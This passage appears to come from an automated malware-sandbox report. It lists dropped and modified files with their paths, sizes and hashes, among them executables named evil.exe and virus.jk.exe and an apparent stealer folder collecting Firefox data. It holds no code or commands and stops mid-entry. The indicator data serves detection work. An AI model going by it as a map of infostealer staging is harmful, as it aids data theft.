ddd60301114f7867605a31a6d7c4c2014fe28bd4e0edfc53024a22d10b7bf3f8

SHA512
5dc630f669ae4ddb6cbe6b6f276d63aaf9f55de964990b4a2a57830bd0fd1127a2ee729bc099b738e813c6e0b23a29c3d73b39bb6055372867eb1dcc57635ae5

Download Submit
C:\Program Files (x86)\LightNeuronX0.exe

Filesize
14KB

MD5
55319464e46e2c31d22b39b46d5477fb

SHA1
a4d1a34fe5effd90ccb6897679586ddc07fbc5cd

SHA256
14f530e16e8c6dbac02f1bde53594f01b7edab9c45c4c371a3093120276ffaf1

SHA512
3a3ad3aa4bf745932d8ea02f3c96774aada2d1d1723be1ceb6cd5b7823e3d0f4e91457dbeebe92c8a2c8e7bdc1134b3b59bb9d9ce7503aeae6c182894203c9a3

Download Submit
C:\Program Files (x86)\TEST.exe

Filesize
37KB

MD5
ca70b79092c1b1e6dc8eb7950864b0ee

SHA1
3396cebc62c348fc96463a73a40eb4e5e6bc09c5

SHA256
2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

SHA512
9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

Download Submit
C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe

Filesize
874KB

MD5
a6a1abaf12a28ea8f6553356c3bdcf57

SHA1
b7613fb9944bc3d8e11b5eb6f7ff706f04e8ad53

SHA256
f2507211585dfe351ff53086f30b42572db223b2646e45f91b7f3e202bb0bb76

SHA512
e525d119128c1ca1c05d379b9ebba9791b7b15390c8999773bff6517fde674178e17ee2c7c126b249c8c54b4dd1c07326ba24d52c8c192f067bc7e8545113a65

Download Submit
C:\Program Files (x86)\evil.exe

Filesize
23KB

MD5
0e0d73422110762ad112c39647865d09

SHA1
4bb94e94e65a8bc12313783df99b96d89d7fd764

SHA256
02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

SHA512
e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

Download Submit
C:\Program Files (x86)\fwclt.exe

Filesize
1024B

MD5
c98a0d1909d8fad4110c8f35ee6f8391

SHA1
3c2b7bb0f3c8ca829602e4182a816a0905398521

SHA256
0f5ec3b9535d4f956330351c5310626ffaa17f146ff51a8b3b10ea0a7039eadc

SHA512
d3760b816b2a3fc3ec4f3ed9eee869885943d95d8a18f8a8233bc3e1b0f774dc9f55b518a54bcac3f94b2d960a73e53987fc09fa338c5b56d20e042610c0d948

Download Submit
C:\Program Files (x86)\kosomk.exe

Filesize
23KB

MD5
926e2c78bcea51e5309db037b18b4202

SHA1
d4b80f95bfdc9c2ff860ac0cc2012a81b425801d

SHA256
1d74f423f423175189fbe07b34697cae04d6d48181efbed5c3b790a137145f10

SHA512
6962876b91bcf7d40d9250dde094ce560f3b3c7a4766ac5e810d27de46cd4167937042d5ae94b21f21a1b19dc4c39dc0107e2aac1fbcd17680345f2fe06354a1

Download Submit
C:\Program Files (x86)\malecus.exe

Filesize
15KB

MD5
0e741eb3f92a7a739628d04a5fd4aab9

SHA1
87a8865773a791ab3ca68201cee7a0c3fef2fab3

SHA256
1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

SHA512
1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

Download Submit
C:\Program Files (x86)\see7.exe

Filesize
574KB

MD5
1ccf28645e2d52556487a9710de54d8e

SHA1
e83b5b14a3d08d8838e23c08070ebec713f859ef

SHA256
513624286483a4e172511b412b82445a06eefc904d54de75da656ec1a6f8ae99

SHA512
5a5f4c5fb992bac2119234563a8a7d3418baab3e3519f936f13a598aa9026dbeba571b7981a5a6afa519e18b124d8cf4c6642b30b88a4a091a051e2b41c5f321

Download Submit
C:\Program Files (x86)\vbc.exe

Filesize
123KB

MD5
d2ce3b2a5f3efb1fcede96304e57a531

SHA1
d74be8fe0be4ec13340dad9c0fdeb653c9c8b90e

SHA256
e0a4948a58829f4ecd9e6fb9b28e127a6827bd8761ded085d2069a248f6f5462

SHA512
fd0d0b51000b146049db24ecac27885ff4f688b4e40b42061972d21aaa45f8657437db8f56880f5414f00b5e35febce8a339b1d30bd387f8f11a179b222e828b

Download Submit
C:\Program Files (x86)\virus.jk.exe

Filesize
2.0MB

MD5
e0d346913cbf16602edf1aceda2a62b1

SHA1
2387b499cba2684ab293a758413ea2a5f150fa45

SHA256
c1bc3d85a9f78eea49adfb80669570c0cd6cd3dda92223496182e3aadf4e0b30

SHA512
a2c9a2708b4e0a32ab10bd29428ad2583382a5bb56dc6641ae07144d8707efd963004d1a5e71a9c8b9c53e09629b60b9ef7e6a16366ee376083937e717c1977f

Download Submit
C:\Program Files (x86)\virus.jk.jk.exe

Filesize
2.0MB

MD5
7f29146a34aeafc8ef837ab6aed8fd6e

SHA1
10120c15f76b1a7b5a30f8fa829caac88c49d9dd

SHA256
de81bcbb17cde244e05a2b8342d5c8d1be0c344e78d0bc45a7f55a4282230955

SHA512
907a395e0efb69fb4066c9104feed095c0864af36f18bb2abc25b97dbb7c8bb6ccbd177afe42da7974fdee9a05e1d2fa4dd89f1863fee75842a5b7677bfebad6

Download Submit
C:\Users\Admin\AppData\Local\040b5477f88fab961bb3378764c3009c\Admin@KVIWLPUJ_en-US\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e765f3d75e6b0e4a7119c8b14d47d8da

SHA1
cc9f7c7826c2e1a129e7d98884926076c3714fc0

SHA256
986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89

SHA512
a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53bc70ecb115bdbabe67620c416fe9b3

SHA1
af66ec51a13a59639eaf54d62ff3b4f092bb2fc1

SHA256
b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771

SHA512
cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
dad5417a2844eb6c1e0ec092814c9f4a

SHA1
3ee686b487da39559980ce73afd1befc1d3df32e

SHA256
8e37aa976e96d4e2ba0483a945536fa898c648baea4c12e7a0c01b02e84435be

SHA512
5729e558b91421a130fc7e7d0733bdbf15c8e1e190f34283a50f70a50b2335f3dfa93aaf1b2c755d9be06472f2038cfa0b04e541bd238cc20be374d38714f10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
aa5446e4fdcd44f32534500b5aaf3da8

SHA1
eeee582743f41f3cdb767db727794234b5267924

SHA256
f937bbe140ef0cedfb7498c21f446c490c4430e03e1baed1a55d6fa385e019ff

SHA512
7553233361431e54d91a8025eb65a58efe7bbb4d7676217a179dc65e1a3225039646191cfdf86997dab6e5996934008e7afc5d4827c16221b474d2e111be8527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bb9ad885328bca8dee6914464aa4c653

SHA1
29cbf8eacdf28ed5d9cc9821c31036e8163aada8

SHA256
9950975617968995e4f771447c7c4fdad71a1328bc22e06804939fe4a302baa6

SHA512
4042bad3bf63780f6cb28ca1742253168298df8bbefeb0ea49fb71ca60f3c4b4fad75964e83e21e7902dae5d1cd53280653df17459db5c9b27459bcf6fe45a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0ec0043e6b52144af4e10d860eede162

SHA1
78adc51c16d1066dc5a0823ca99a614debcad82e

SHA256
588cb8b17383dfafbbea6eb316dee03051e08c09b9577a08c009d1110ea22240

SHA512
91ad7940749289ab9abe7c8cce46af9c657dd8222ef7fbc43b043ff77a1bb02d3e5b92413e2e552bb7ce68095ec81b4a9603adcfe9d3042772303c570d7dc134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
de4bca88e2e5662c59ecbe04a375ed3d

SHA1
c9364cd1582c3594baf7950fc8b1f0d8bc040ae9

SHA256
0c2b582944656f68d059015b71bf7cee462742b355b2272e603a32865828a620

SHA512
bf9b2c8af59926c0aba3b38ce1c205c915f294587083386cc35ad5303b78bcca0cd5035baf461e907b9a7e942425b72fe904ad14ba6f4d6ac0270efde36732d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
493426e3676e53d5201a37f293076f77

SHA1
f3d377bd64cd6722efc72bed476f5f6446807710

SHA256
8fb3b7bcefd71120425c707663073392f4f73773c89d390c578f0058089a1b50

SHA512
8bf9aa681d646ed79595a396ca129060d3b318ed3e208218d19f55d949d4b98a26cd60b57cadfd346f3549e0872897b54e9af2993fa1bb364854e8d63ac2369f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a5e7d.TMP

Filesize
370B

MD5
6902d5f46eea04e76419a06db030bd21

SHA1
1999a91819e7d4928e11902292589e4038f9ec9d

SHA256
0ca739ec59ec63b4629ba5ae5389f0d33303be51f0044fe6064f75a11698803e

SHA512
b3baf5854d02c4443d5a4a2711994fc26d8906dda98988a7ccf39c18e2dc285e3c146570f112ada581c0d39c250c01e43074b8751ad800e0ee012daa94fccc94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
db1c06e4c2534ba4fda550b888a1b436

SHA1
66bce05e14de9d249a2b6e8db065ac3a5a3e23d5

SHA256
549d8d226b494f2b8286fc211c09471b883c27a968da5b243d681d531e3da145

SHA512
2ee3cb38f4345061c97cac69d408b470932bcb9ebb3d7edc8bdc6f7e9f27ce02bf210d15f04273d92fdcb89cc026050ef5733e9ec6ea25e7c78980cdeea610f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
24d95c45c1b85875e62b37be17c8701a

SHA1
f7deaf3658df66b53a53e0fd3be8cc9f07989db9

SHA256
6426f67de225e0bcb13fcb36922a2d00e21782279db9b7b53f9317591f86122f

SHA512
0811b7d050e328be1c63a10ac233b4636c2d5ed27a00b30596203af6902fd215cf243841df4f81f9c9a76388da19c7f097f03354a4be49d5532b7a4c00ee52f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
56KB

MD5
0bf11a6dede571662862aa60954cde29

SHA1
67fe7889f7df15d61f796af0dbe8b1f208287fd9

SHA256
82511da2c639dd373ef79beab2e0c5a3a6718869f800bc063e34b213b94741cd

SHA512
2f53eb9914dcd6b8146922f438a81da095b69a2688d010a32b951c4de57533772d6b49a5f175ca54d279d01d0e785071403f4c049438055dd7126ed1017a925c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\activity-stream.discovery_stream.json

Filesize
17KB

MD5
d2c3d6e10895ddaeceece77a87f9d119

SHA1
b6ac375346c4982ab020126aff87e0d82ef8ca24

SHA256
fab6e6a6b90228505b5770fa0eb273ddf649460a33a185ba7486b41f1a54d6ef

SHA512
5006f64326f624beaecf113f13ef4b5dad6f6fa838670fff8024a746c6c03155498538a979071e3132d987983b6dcc1a0f978cb04cc7fcfcf38f8d53821e7ff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\77696E766965772E6F6378FA.tmp

Filesize
512B

MD5
0125fa4997a50e29623c263806ea118c

SHA1
0282dc194e0a62ea8e469cd6e7cd7b87fbc402f8

SHA256
135523d6f5e2b009e5d897ecc7c2c770c2f90c9e2f2ce0eeadf6a551ca47f5a4

SHA512
ee5311331418eb5f1aee46a5f5a29e641914aab62aaa5e0ee76217abaa0199233d260c60a58be12397b627ed63c73300c99011c0c207d86abb1cb34720b4f03c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlzrza4u.3mc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe

Filesize
5KB

MD5
f9e42c92e371cedc22c78e2900418651

SHA1
3e99ba4a4a007d2ad1cfa6e3fda91b01a710839d

SHA256
f340bf91627787a2770c897aa9555bb82382cdcc2232904b5707238ab0a85e39

SHA512
7ca0a18f7ae83f0d11d8b33ddca579fb5e5629b5255eebf28b2e256a0b4449f4dee5bdff2ef6f9e1af323a04111a688d9251629ddecb046746978f94d469de05

Download Submit
C:\Users\Admin\AppData\Local\Temp\jplmbcuny

Filesize
4KB

MD5
0dbceb0fc7bcb589c214a5cbdf34b95b

SHA1
e7f948a31c2ce8ac25cce1169654435cec455bef

SHA256
7a5c8835a40792321f57502a295e3972d2b1b1288ae9bd2e8899169a67941097

SHA512
7be085588931f5ca5fe9622e6b758eb5da6dbd683732814e1c570e113b0d144088dbfe52f3c5116619a4df97b45b8d5804581bb807e0725b353520cc4b2432da

Download Submit
C:\Users\Admin\AppData\Local\Temp\jurqlvqzsu80j5x5

Filesize
103KB

MD5
d36bfa103f3793806490cc1e20ceb429

SHA1
9ffc447f3faf0bd6047af095650237c6be04cc5e

SHA256
098b0f7a8e149f3f30525c7d956324bdef23f43648ad136ed21b393f21e64f99

SHA512
7662f73f06600360f83af60bdf9b8be37e8eca9702b804161df59697f26c3f14679dce7c9c0f24a49aadced618a1885b690df8477768068b5f4f2182fde4c7cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin

Filesize
6KB

MD5
33573d148211e8e089e861135032aa0a

SHA1
fcdee11ba481c9fb811e07265181986dbc28c66a

SHA256
ce199db2bbd2ed9b5a9b6fb1bbd377067fe10f572eceed063a1ffbf80cb3357e

SHA512
08e3add656492cbeec8fcb4406ad1735b13f771fb652417b260eb370a40561220c4bc9e2ef1ad19b555eb7687f2d1b1ad0b3203de2bf89afa75714251271c60b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin

Filesize
6KB

MD5
101f3d0b562eddacdc1f42bbea747f96

SHA1
507c9d056f034177496599e11ae9465f18fa4cbc

SHA256
8afb4c3f341ceb96f485da6222db55f15558790b7f0cd5ad68a8bbcd62abb00f

SHA512
028806420c33ec85cac24bc079082a1dc338aaf67cd0612a556cac60ba61cd9e518a53ee354ef10b725327bebeb17e2afaa06ad6f5775d5a20b57f0334fca5d5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin

Filesize
15KB

MD5
517654b0ecec508e1311bb473cb495e4

SHA1
4049323c593caa1f91ebed59438eb92b75bd40e9

SHA256
8551f3d5344c060527011c9eeda741c88718d3cbc7b5a28d929b92640a08f9c8

SHA512
9fff9f15c037994b0a4622ccf29b1d260d6713d11d3267e6e6a1da7b3e960b9ed3ea88f5792023b0250e2af51dedae9b310493757e21a67ebcbc7153462f9fd5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin

Filesize
8KB

MD5
73b2fb8608671b2c919352eb22d8a6f5

SHA1
25adb595c2f93917aeebd7e1e773154a4ff6d5c5

SHA256
c11966eba5231b419f747ea7f1d87a4adf72e5f0f69a3c6de3fb1d5586d5bb95

SHA512
27e4ac87ebe603f02fb4d7a200db947ee946f63ec6b1cd93e12025acc0b6dff346132eb9571fdd27de68f068f0d62ecd889c7a2000da51268c3880e8b8f75512

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
0c6b58ef271cce88d821321fefa8b140

SHA1
3c64e65bec4e96bc63b47e2b05d2161fdc80d3cb

SHA256
8d02a8680827279f0c490d02c5bef6e09f09a38dd11ab349dbec0ba9d719cb3b

SHA512
9d95fd97cf474c2310678c84902b886574dffdb2368f3dae406b3543cfae9dbb0634ccef01620d34c7a7c22b123ff6998a738eb9fe0fbbf84009a572eaa51873

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
38a1e5511e11ee7ac051686672b16a10

SHA1
27644bfcfad873d6e1fdde97a3db560677cac739

SHA256
dac9b06589254701eb863bec19fda48681b2404cf10befe45eb9c03288b04e3f

SHA512
d0f21f4e342935c530ea5e0bff54e918dd2281c43282ca70192c11e8419911bd72645247bd69766cae161d7ec6b6dabffc47dcff0cb7bd0886a64a4ce48eaa8e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\5fc2c7b1-b17e-4b1c-a645-80e4788e2edd

Filesize
671B

MD5
936ae09604870dfd4e0dae04c2e18b6b

SHA1
6f3cdb42f9f06d20381c1c56d490db777f7e9fc1

SHA256
4478f83ff210b6b8b872e73cd266b5eb576b87848e2523c32f215fc9eafe254c

SHA512
af73059d8dcedaf9290224dac761c75ffabf90dd0afb0a64f3ef66584639987a897406725953f93cd6af17f085ed5b35d76b2a9b238a63a14e24211285332110

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\6834720b-f753-4883-9a6e-e533062d5b55

Filesize
982B

MD5
d2db04d3a1c58037f3e7341508176146

SHA1
0ab5f96ddf66168c4ebeb2ee8b5187ca12ceb030

SHA256
321429293ff4964c042a064391b239d745e60449c1dc564336f09f6c7ef6203e

SHA512
2e94e266e21950eadae08885a481b6fd0fb9e494cde4c77e0584083e666613cb4bc10368048b99d10fca3d1ac92ecd7cf87b01c279a772041a0b68690bda6328

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\b8f2b709-089f-4806-9022-450d8844c236

Filesize
25KB

MD5
196f3c22e1e8bd68efd1702ad24889a3

SHA1
5b208582c65aa240923486ccb33564ed477ae20f

SHA256
1ef08bc19466a1df42a4be5a3fba8248d43f7a1534b15699970543e1f8cf7639

SHA512
3956e642771ffa124993843eef712357699ab73ade05e2d913e14427c8d10a8d14728b344c457bc9bdad997464babb4559764dccfbedc7731c323dfbc6847d22

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs-1.js

Filesize
12KB

MD5
570865180a09526856b1096c90a80b10

SHA1
40a93aa46262db700f80ad32f7b0c1a8eef9fc97

SHA256
770a4585b2ca138c23d20ea4fc7f0fb7faf02e0817de3f4cd231e47b8182d7b3

SHA512
b6e94c3982369993801e9a2d3fe6d82d2b78e92f4e6658ed2a69c1f3d03428c7fb7c8250ebd0b935febcd054dfaf9e2acdada1369e522d483cd940c3be019f09

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs-1.js

Filesize
11KB

MD5
be0d928ddf97a9def6d2b846fd1dd4b0

SHA1
e1763c3851e715054751be8d311f430dbb01d856

SHA256
0080f4b3d2f92cc6b18595acb39bf2837484c623eb133df1617c2b045ed11b13

SHA512
9b94e7547366507dd4a1b639185482b21a9754b41a0cea0b0bcd34cb17f3d661b318c0033482183cb802283fe8210b4829a3cfdad5e082fe6f1a81033df14a8d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs.js

Filesize
11KB

MD5
b4560ae8656dff8cfa1a9f696630fced

SHA1
8b658750d361c4a059cb2adaab144093d38566f0

SHA256
4c3ab6ae368aa3e61b058bb106e9b9b2e2d14ab541ee529bff98afe31aa42bea

SHA512
597ad1c80fccf703663d27326354b75ee3970a1e5b7a798538dd8c14a2ba2db894d09ddd6d26a48bd7d4d0ac41235fbb489ef4b746299fd35a707573156c5717

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs.js

Filesize
11KB

MD5
f27ae7430927872adb2891d8a744a0fa

SHA1
d5d49891fc2abc383324200e646ce70cea6264da

SHA256
47fe4be1707448427999619eb03fff707fa010bc61fb8ebe296ecfb18ca1af58

SHA512
09aa596a02f7f4b2aa2e9308d1c96f56da8b536e23abda0f5fd2ddf60f4d78db29d821bcc56a371144126ded23fd2300a48ab7e2e9e053c73ec0385d99a669c1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
d5fef31e9a8ec4b781c884ebb24a8b8a

SHA1
d4f28a466ab21e2fd7a00c65aaf730277d635f98

SHA256
e5dfe4896b8dffbc025d0b494acdaede4d543e9958e41e8cf171a4d94be71431

SHA512
9049a953507ea23fe2803035dab7b452063d72bfe6905d6eec747654a97b419f9405270944856bb784fc80832d6c8374686627f98abb2a918842de261dc1e026

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
bb908ba05172ef88e6ddb59695a597f8

SHA1
61014eb27cb4a55aa41e0066a5d5cdf6e6b4e128

SHA256
6ef41cb6518aadf656fee4e53971532a12257f7bb992a1ddce231310aa775b37

SHA512
bc1ded0eb38687d426ded005e8e860c448efa275e482289189d3fa1b7a3defecfe1e3c3de5d4e06b072fa1c51e7f479fa5f8761264eeb5caba735ee36d551f5e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
e39d26c6d4671debc3e96eb14f5629ca

SHA1
e080ad8adad9c6e161b3c6460c0c2c0946c93628

SHA256
8177240f91c582b2375da9eb22f78f4c1eccd79b103510bb9cf5eb974e343f00

SHA512
56a95df1cf072c5f84a9d71c36459310803d967d873e15f899c507ba53aad9b6c3981cc13daee040c14aeb59c5abb46fdefbda1d355ba03e8ec2d23911efcf13

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
602a41fc32cb2a0806cc89f856c37287

SHA1
e512db226b8bcfb7b4442b1d5c8db24277a474d1

SHA256
2b97f3a813600efcab6e77665873975e04f3a593876527d686440cf479022c84

SHA512
6b773fab872ad1287806c9443984acc2383e8b526862bbf094e77cf9bbec5369af8ad627aa85043ed0b54f562ca79dc88fb45ea43378c8a698df431b2986a02d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
51b714034bfea7120c02d2aad6b24c98

SHA1
209a9d6c2b1a68f501e690a948b173e3250644b0

SHA256
858cbdcf4114582dd047f37018add340eaeb226d853583f016228e96ed5f4cb7

SHA512
86a8cb0c33c5f5bbd9bb5c6fc131388f1473349e0af6b6ea9039d99898d0f0f59d0f3f59250cafebdf2b8a89f4b71512dc95af62c722e803d4f7a627b749db44

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
384KB

MD5
370b873dddcdeabeeefb103d9c174ef8

SHA1
a8cc0536b22697b46ab47cb6ec6b02370329f669

SHA256
